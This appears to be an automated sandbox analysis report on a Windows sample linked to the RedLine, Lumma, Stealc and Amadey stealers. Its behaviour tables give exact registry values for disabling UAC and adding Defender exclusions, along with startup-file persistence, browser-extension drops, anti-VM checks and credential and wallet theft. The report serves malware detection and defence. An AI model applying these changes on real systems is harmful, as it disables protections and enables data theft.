Analysis Overview
SHA256
62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22
Threat Level: Known bad
The file 62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics was found to be: Known bad.
Malicious Activity Summary
PrivateLoader
Stealc
Lumma Stealer
RedLine
Modifies firewall policy service
RedLine payload
Amadey
UAC bypass
Windows security bypass
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Sets service image path in registry
Modifies Installed Components in the registry
Drops file in Drivers directory
Checks BIOS information in registry
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
Registers COM server for autorun
Windows security modification
Identifies Wine through registry keys
Loads dropped DLL
Executes dropped EXE
Unexpected DNS network traffic destination
Drops startup file
Modifies system executable filetype association
Checks computer location settings
Enumerates connected drives
Checks installed software on the system
Checks for any installed AV software in registry
Maps connected drives based on registry
Drops Chrome extension
Installs/modifies Browser Helper Object
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Writes to the Master Boot Record (MBR)
Drops desktop.ini file(s)
Suspicious use of SetThreadContext
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Unsigned PE
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Suspicious behavior: LoadsDriver
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Delays execution with timeout.exe
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Modifies system certificate store
System policy modification
Suspicious behavior: EnumeratesProcesses
Suspicious use of UnmapMainImage
Checks processor information in registry
Modifies registry class
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Enumerates system info in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-30 03:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-30 03:45
Reported
2024-05-30 03:47
Platform
win10v2004-20240426-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
Amadey
Lumma Stealer
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe | N/A |
PrivateLoader
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v1qzaERnffknuPgDQ7VNqfXT.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DvusSCfcuG8ANn3bW2XJWnrs.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\65SSH565EumlmslpPTUiUKnl.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Task Manager.lnk | C:\Users\Admin\Pictures\6gOQA073DOsYkG6b0EgvvAcd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N9rC1hpQP7M2PJ6BV3slvC7b.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xC5jdcWArjyBGAnOOxyjqoSq.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FPph4fgdmcU50Bfgx9FYmuk5.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\ThdYwKZvKmIzn3rj3JtxK05A.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Pictures\ThdYwKZvKmIzn3rj3JtxK05A.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS68.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\5MoH8bIPQ8SA8ROOsxUfnRrI.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File created | C:\Program Files (x86)\tegRANPZONsU2\FcWcCnF.xml | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File created | C:\Program Files (x86)\YLgKyOFzWxOqC\sECwqfW.xml | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File created | C:\Program Files (x86)\JipyTrDkU\zCzpeRf.xml | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File created | C:\Program Files (x86)\nFLFFjqrQPUn\WjzSeVe.dll | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File created | C:\Program Files (x86)\JipyTrDkU\UhtGxG.dll | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File created | C:\Program Files (x86)\tegRANPZONsU2\UUihwtyGLxlGm.dll | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File created | C:\Program Files (x86)\krdeMCnRKomDOvwVunR\xEuZZMb.dll | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File created | C:\Program Files (x86)\krdeMCnRKomDOvwVunR\mTHmWcc.xml | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
| File created | C:\Program Files (x86)\YLgKyOFzWxOqC\FsFKYYw.dll | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\mFHhzFD.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\axplont.job | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| File created | C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\WKALCIrwIEiqhKBsn.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\jiLwFdOzPPQiWLm.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\QdCYtDviHOrgqJLgZ.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
